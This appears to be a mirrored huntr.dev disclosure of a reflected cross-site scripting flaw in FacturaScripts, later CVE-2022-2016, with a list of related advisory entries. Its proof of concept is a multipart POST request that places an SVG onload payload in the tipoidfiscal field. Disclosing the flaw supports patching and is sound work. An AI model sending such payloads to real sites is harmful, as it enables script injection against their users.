Lucene search
Iohehe5FA17E9B-C767-46B4-AF64-AAFB8C2AA521HistoryJun 04, 2022 - 1:03 p.m.
Cross-site scripting - Reflected XSS caused by error logs in neorazorx/facturascripts
2022-06-0413:03:56
iohehe
www.huntr.dev
21
0.001 Low
EPSS
Percentile
21.6%
Description
There are two fields that can insert the XSS payload by the error log.
- http://127.0.0.1/facturascripts/EditBalance, the
codbalancefield - http://127.0.0.1/facturascripts/EditSettings, the
tipoidfiscalfield in Fiscal Id
Both fields require 1 and 25 numbers or letters, no spaces, accents or any other character.. So we can not store the payload, but we can trigger a reflected XSS via the error log.
Proof of Concept
POST /facturascripts/EditSettings HTTP/1.1
Host: 127.0.0.1
...
------WebKitFormBoundaryYIfWjQXpEB2jLexN
Content-Disposition: form-data; name="action"
edit
------WebKitFormBoundaryYIfWjQXpEB2jLexN
Content-Disposition: form-data; name="activetab"
EditIdentificadorFiscal
------WebKitFormBoundaryYIfWjQXpEB2jLexN
Content-Disposition: form-data; name="code"
CI
------WebKitFormBoundaryYIfWjQXpEB2jLexN
Content-Disposition: form-data; name="multireqtoken"
61893af8ff1671201dcbeaff4d052cf544c4de1e|MvOEut
------WebKitFormBoundaryYIfWjQXpEB2jLexN
Content-Disposition: form-data; name="tipoidfiscal"
CI<svg/onload='alert(/xss/);'>
------WebKitFormBoundaryYIfWjQXpEB2jLexN
Content-Disposition: form-data; name="codeid"
------WebKitFormBoundaryYIfWjQXpEB2jLexN--
Related
osv
osv
CVE-2022-2016
2022-06-09 16:15:08
Cross-site Scripting in FacturaScripts
2022-06-10 00:00:55
nvd
nvd
CVE-2022-2016
2022-06-09 16:15:08
cve
cve
CVE-2022-2016
2022-06-09 16:15:08
prion
prion
Cross site scripting
2022-06-09 16:15:00
veracode
veracode
Reflected Cross-Site Scripting (XSS)
2022-06-10 05:36:10
github
github
Cross-site Scripting in FacturaScripts
2022-06-10 00:00:55
cvelist
cvelist